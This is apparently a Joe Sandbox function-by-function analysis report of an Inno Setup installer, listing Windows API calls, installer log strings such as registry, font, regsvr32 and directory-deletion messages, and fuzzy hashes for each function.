                                                                            • Part of subcall function 00457770: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004578A2,00000000,004579EF,?,00000000,00000000,00000000), ref: 004577BD
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004579EF,?,00000000,00000000,00000000), ref: 004578FE
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004579EF,?,00000000,00000000,00000000), ref: 00457964
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          Strings
                                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00457918
                                                                          • v1.1.4322, xrefs: 00457956
                                                                          • .NET Framework version %s not found, xrefs: 0045799E
                                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 004578B2
                                                                          • .NET Framework not found, xrefs: 004579B2
                                                                          • v2.0.50727, xrefs: 004578F0
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Close$Open
                                                                          • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$v1.1.4322$v2.0.50727
                                                                          • API String ID: 2976201327-1070292914
                                                                          • Opcode ID: 459b95da5429d7d35dab5d0c6b2d4d5a6c6ec011e70205ce483ffcd3ec2b4037
                                                                          • Instruction ID: c0ad98b253435a04450e4f0d412c4263007441af3f925dfe38269f217dae66aa
                                                                          • Opcode Fuzzy Hash: 459b95da5429d7d35dab5d0c6b2d4d5a6c6ec011e70205ce483ffcd3ec2b4037
                                                                          • Instruction Fuzzy Hash: 2741EC70A081465FDB00DFA5E851BDE77B5EB49305F54447BE400DB243D7799A0ECB68
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0045DC20 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SHGetMalloc.SHELL32(?), ref: 0045DC5B
                                                                          • GetActiveWindow.USER32 ref: 0045DCBF
                                                                          • CoInitialize.OLE32(00000000), ref: 0045DCD3
                                                                          • SHBrowseForFolder.SHELL32(?), ref: 0045DCEA
                                                                          • 756CD120.OLE32(0045DD2B,00000000,?,?,?,?,?,00000000,0045DDAF), ref: 0045DCFF
                                                                          • SetActiveWindow.USER32(?,0045DD2B,00000000,?,?,?,?,?,00000000,0045DDAF), ref: 0045DD15
                                                                          • SetActiveWindow.USER32(?,?,0045DD2B,00000000,?,?,?,?,?,00000000,0045DDAF), ref: 0045DD1E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ActiveWindow$BrowseD120FolderInitializeMalloc
                                                                          • String ID: A
                                                                          • API String ID: 2698730301-3554254475
                                                                          • Opcode ID: 35e8b70af3f9a11701dc89ad6a7dc5067c9e57c40fd942637c72eceddb9e2f2f
                                                                          • Instruction ID: cf29a6196fb2df87458bc734ae7ceebd32c59f4afd20480d407c1097e6e56ab9
                                                                          • Opcode Fuzzy Hash: 35e8b70af3f9a11701dc89ad6a7dc5067c9e57c40fd942637c72eceddb9e2f2f
                                                                          • Instruction Fuzzy Hash: E0311271D00208AFDB11EFB6D886A9EBBF8EF09304F51447AF804E7252D7785A44CB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418BC4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemMetrics.USER32(0000000E), ref: 00418BE0
                                                                          • GetSystemMetrics.USER32(0000000D), ref: 00418BE8
                                                                          • 6F552980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418BEE
                                                                            • Part of subcall function 00409920: 6F54C400.COMCTL32((FI,000000FF,00000000,00418C1C,00000000,00418C78,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00409924
                                                                          • 6F5BCB00.COMCTL32((FI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C3E
                                                                          • 6F5BC740.COMCTL32(00000000,?,(FI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418C49
                                                                          • 6F5BCB00.COMCTL32((FI,00000001,?,?,00000000,?,(FI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000), ref: 00418C5C
                                                                          • 6F550860.COMCTL32((FI,00418C7F,?,00000000,?,(FI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000,0000000E), ref: 00418C72
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: MetricsSystem$C400C740F550860F552980
                                                                          • String ID: (FI
                                                                          • API String ID: 1828538299-1614602237
                                                                          • Opcode ID: a62bb13e1bd7fa3b9c7351fff79d2a2ecdea0cb757dbaccc16c00855b604fece
                                                                          • Instruction ID: 8ee50baf9f6b03e6802097753a63af578849a2694d0e9ed51cb84c1dfac16794
                                                                          • Opcode Fuzzy Hash: a62bb13e1bd7fa3b9c7351fff79d2a2ecdea0cb757dbaccc16c00855b604fece
                                                                          • Instruction Fuzzy Hash: B51136B5744204BADB10EBF5DC82F5E73B8DB49704F50406AB604E72D2E6799D408768
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0045B5D8 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045B5E1
                                                                          • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045B5F1
                                                                          • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045B601
                                                                          • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045B611
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                          • API String ID: 190572456-3516654456
                                                                          • Opcode ID: 0244c5342f474d5f0d92f6c90a29f5f03fc9f5158d69ccc7f6593d0f4fc18990
                                                                          • Instruction ID: fd82cc1e756c275edc3707c7f07377cec179b09f743abcb6ba5c01fe1bd4d686
                                                                          • Opcode Fuzzy Hash: 0244c5342f474d5f0d92f6c90a29f5f03fc9f5158d69ccc7f6593d0f4fc18990
                                                                          • Instruction Fuzzy Hash: E5012CB0500746DEEB14DF72EC90B2736A5E7E870AF14803BA845562AADB7C044BCE5D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041A84C Relevance: 13.7, APIs: 9, Instructions: 176windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetBkColor.GDI32(?,00000000), ref: 0041A929
                                                                          • 73A24D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041A963
                                                                          • SetBkColor.GDI32(?,?), ref: 0041A978
                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041A9C2
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041A9CD
                                                                          • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041A9DD
                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AA1C
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041AA26
                                                                          • SetBkColor.GDI32(00000000,?), ref: 0041AA33
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Color$StretchText
                                                                          • String ID:
                                                                          • API String ID: 2984075790-0
                                                                          • Opcode ID: 96642afef6407557abda8c1cb6f38d9a010b32914ce32b6cc36c1a5a9073b633
                                                                          • Instruction ID: 5791d4d8e51028595b948ed591e6ff6c43c29dc3dd821c9bc5bae20fa008be23
                                                                          • Opcode Fuzzy Hash: 96642afef6407557abda8c1cb6f38d9a010b32914ce32b6cc36c1a5a9073b633
                                                                          • Instruction Fuzzy Hash: F661E5B5A00104EFCB40EFA9D985E9AB7F8AF0D314B10816AF518DB252C734ED41CF58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00455F7C Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 126COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042D7A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D7B3
                                                                          • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00456130,?, /s ",?,regsvr32.exe",?,00456130), ref: 004560A2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseDirectoryHandleSystem
                                                                          • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                          • API String ID: 2051275411-1862435767
                                                                          • Opcode ID: 1ae4d1559c225658233d195df01a5ac76f1bcba5e74ca4c9dacf9a152af87d32
                                                                          • Instruction ID: 1b1342de70b8511bd96e109cd760b193c6bc6e2768a22c9f7c7172ce61990ba6
                                                                          • Opcode Fuzzy Hash: 1ae4d1559c225658233d195df01a5ac76f1bcba5e74ca4c9dacf9a152af87d32
                                                                          • Instruction Fuzzy Hash: 95411970E007085BDB10EFE5C842B9DB7F9AF44305F91407BA904BB297D7789A098B59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0044CA0C Relevance: 13.6, APIs: 9, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • OffsetRect.USER32(?,00000001,00000001), ref: 0044CA3D
                                                                          • GetSysColor.USER32(00000014), ref: 0044CA44
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0044CA5C
                                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA85
                                                                          • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044CA8F
                                                                          • GetSysColor.USER32(00000010), ref: 0044CA96
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0044CAAE
                                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CAD7
                                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CB02
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Text$Color$Draw$OffsetRect
                                                                          • String ID:
                                                                          • API String ID: 1005981011-0
                                                                          • Opcode ID: 9e5c892965933efe92cb1196a4cf079dced8b69e9bfa1b103b040bba4ee2a0e0
                                                                          • Instruction ID: 79e5725ec2e75caab84353522faa1c644d19f3f9c4a46f72b84b259f8bdbd55b
                                                                          • Opcode Fuzzy Hash: 9e5c892965933efe92cb1196a4cf079dced8b69e9bfa1b103b040bba4ee2a0e0
                                                                          • Instruction Fuzzy Hash: 3921EFB42015047FC710FB2ACC8AE8BBBECDF19319B01457A7918EB393C678DD408669
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00472E88 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 92windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00472DB0: GetWindowThreadProcessId.USER32(00000000), ref: 00472DB8
                                                                            • Part of subcall function 00472DB0: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00472EAF,00494F8C,00000000), ref: 00472DCB
                                                                            • Part of subcall function 00472DB0: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00472DD1
                                                                          • SendMessageA.USER32(00000000,0000004A,00000000,B2G), ref: 00472EBD
                                                                          • GetTickCount.KERNEL32 ref: 00472F02
                                                                          • GetTickCount.KERNEL32 ref: 00472F0C
                                                                          • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00472F61
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                          • String ID: B2G$CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                          • API String ID: 613034392-3430418260
                                                                          • Opcode ID: 83606b9c116b6885daef421b7b8e00522d494f7ddc4e48254dfbdcdd32f55c78
                                                                          • Instruction ID: 8c95786dad12656d13a73ee76c7a4d3a126e112e6abc10061d0091179ba2d091
                                                                          • Opcode Fuzzy Hash: 83606b9c116b6885daef421b7b8e00522d494f7ddc4e48254dfbdcdd32f55c78
                                                                          • Instruction Fuzzy Hash: 00319174E002159ADB10EBB9C9867EEB6F09F44304F60843AF548EB392D7BC8E41879D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00490414 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90sleepsynchronizationthreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0044FE04: SetEndOfFile.KERNEL32(?,?,0045A666,00000000,0045A7F1,?,00000000,00000002,00000002), ref: 0044FE0B
                                                                            • Part of subcall function 00406EB8: DeleteFileA.KERNEL32(00000000,00494628,00492509,00000000,0049255E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406EC3
                                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 004904A5
                                                                          • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 004904B9
                                                                          • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004904D3
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004904DF
                                                                          • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004904E5
                                                                          • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004904F8
                                                                          Strings
                                                                          • Deleting Uninstall data files., xrefs: 0049041B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                          • String ID: Deleting Uninstall data files.
                                                                          • API String ID: 1570157960-2568741658
                                                                          • Opcode ID: 3a7a3c4f988273c5faf0984e358184faf661e247c75e3eb8a852b62590ab03d6
                                                                          • Instruction ID: c015f2c418b27fe41d2ce248e3be245557a268e7959eb0275d209c4c83f57638
                                                                          • Opcode Fuzzy Hash: 3a7a3c4f988273c5faf0984e358184faf661e247c75e3eb8a852b62590ab03d6
                                                                          • Instruction Fuzzy Hash: DB21BB70344700AEEB21EB76EC55F2B77A8EB55744F60453BBA04DA6D2D6BC9C008B1C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0046BC24 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89registrywindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046BD21,?,?,?,?,00000000), ref: 0046BC8B
                                                                          • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046BD21), ref: 0046BCA2
                                                                          • AddFontResourceA.GDI32(00000000), ref: 0046BCBF
                                                                          • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0046BCD3
                                                                          Strings
                                                                          • Failed to set value in Fonts registry key., xrefs: 0046BC94
                                                                          • Failed to open Fonts registry key., xrefs: 0046BCA9
                                                                          • AddFontResource, xrefs: 0046BCDD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                          • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                          • API String ID: 955540645-649663873
                                                                          • Opcode ID: 7a6271196282a98db9218d46e73dadc0b019169c58c33c438b6e42a7b698be6e
                                                                          • Instruction ID: 8028dfed4777ef4cba2b708c37a4b099d1cdf5d3aae4b1ac28208e9a303e9908
                                                                          • Opcode Fuzzy Hash: 7a6271196282a98db9218d46e73dadc0b019169c58c33c438b6e42a7b698be6e
                                                                          • Instruction Fuzzy Hash: E121B2707402047BE710EBA69C42F6E67ACDB55704F60443BB900EB2C2EB7D9E4596AE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0045F330 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00416380: GetClassInfoA.USER32(00400000,?,?), ref: 004163EF
                                                                            • Part of subcall function 00416380: UnregisterClassA.USER32(?,00400000), ref: 0041641B
                                                                            • Part of subcall function 00416380: RegisterClassA.USER32(?), ref: 0041643E
                                                                          • GetVersion.KERNEL32 ref: 0045F360
                                                                          • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 0045F39E
                                                                          • SHGetFileInfo.SHELL32(0045F43C,00000000,?,00000160,00004011), ref: 0045F3BB
                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0045F3D9
                                                                          • SetCursor.USER32(00000000,00000000,00007F02,0045F43C,00000000,?,00000160,00004011), ref: 0045F3DF
                                                                          • SetCursor.USER32(?,0045F41F,00007F02,0045F43C,00000000,?,00000160,00004011), ref: 0045F412
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                          • String ID: Explorer
                                                                          • API String ID: 2594429197-512347832
                                                                          • Opcode ID: 5c897608954e0c34f46d57c9c9468377b08e724fc1c9a15d7250c0687c3dca48
                                                                          • Instruction ID: 84e95c20810325967785af02823865f4c58c42daffe30e25327ba0847e04abb2
                                                                          • Opcode Fuzzy Hash: 5c897608954e0c34f46d57c9c9468377b08e724fc1c9a15d7250c0687c3dca48
                                                                          • Instruction Fuzzy Hash: 01213A707803046AE710BB769C47F9B36889B0A709F4144BFBF05EA2C3CA7D8C09866D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401A90 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(00494420,00000000,00401B68), ref: 00401ABD
                                                                          • LocalFree.KERNEL32(00653390,00000000,00401B68), ref: 00401ACF
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,00653390,00000000,00401B68), ref: 00401AEE
                                                                          • LocalFree.KERNEL32(00654390,?,00000000,00008000,00653390,00000000,00401B68), ref: 00401B2D
                                                                          • RtlLeaveCriticalSection.KERNEL32(00494420,00401B6F), ref: 00401B58
                                                                          • RtlDeleteCriticalSection.KERNEL32(00494420,00401B6F), ref: 00401B62
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                          • String ID: dIe
                                                                          • API String ID: 3782394904-2902252405
                                                                          • Opcode ID: ca3664eef181b3c450eb25f8da65eda267e6af06c45086156d65a8afb80b51bf
                                                                          • Instruction ID: e723898d31bd980d44dc420abd38e4993862ec3455be7bfe2ac2130caf5f6e99
                                                                          • Opcode Fuzzy Hash: ca3664eef181b3c450eb25f8da65eda267e6af06c45086156d65a8afb80b51bf
                                                                          • Instruction Fuzzy Hash: 9D11BF30A003405AEB15AB65EC82F263BE497E570CF44007BF50067AF1D77C9842C76E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00458160 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,004582E2,?,00000000,00000000,00000000,?,00000006,?,00000000,00491717,?,00000000,004917BA), ref: 00458226
                                                                            • Part of subcall function 00452C34: FindClose.KERNEL32(000000FF,00452D2A), ref: 00452D19
                                                                          Strings
                                                                          • Failed to delete directory (%d). Will retry later., xrefs: 0045823F
                                                                          • Failed to strip read-only attribute., xrefs: 004581F4
                                                                          • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00458200
                                                                          • Deleting directory: %s, xrefs: 004581AF
                                                                          • Failed to delete directory (%d)., xrefs: 004582BC
                                                                          • Stripped read-only attribute., xrefs: 004581E8
                                                                          • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 0045829B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseErrorFindLast
                                                                          • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                          • API String ID: 754982922-1448842058
                                                                          • Opcode ID: 86182c70a77fd2d711cf7b3f935fad52ad940f5dc0f2bb935dd50f6a8db30579
                                                                          • Instruction ID: a7040656d29ea07138429a65227d1fe8661808dade238f8de5d3983c6959866f
                                                                          • Opcode Fuzzy Hash: 86182c70a77fd2d711cf7b3f935fad52ad940f5dc0f2bb935dd50f6a8db30579
                                                                          • Instruction Fuzzy Hash: DE41A630A046499ACB00DBA984453BF7AA59B49306F5085BFBC11FB393CF7C890D875E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

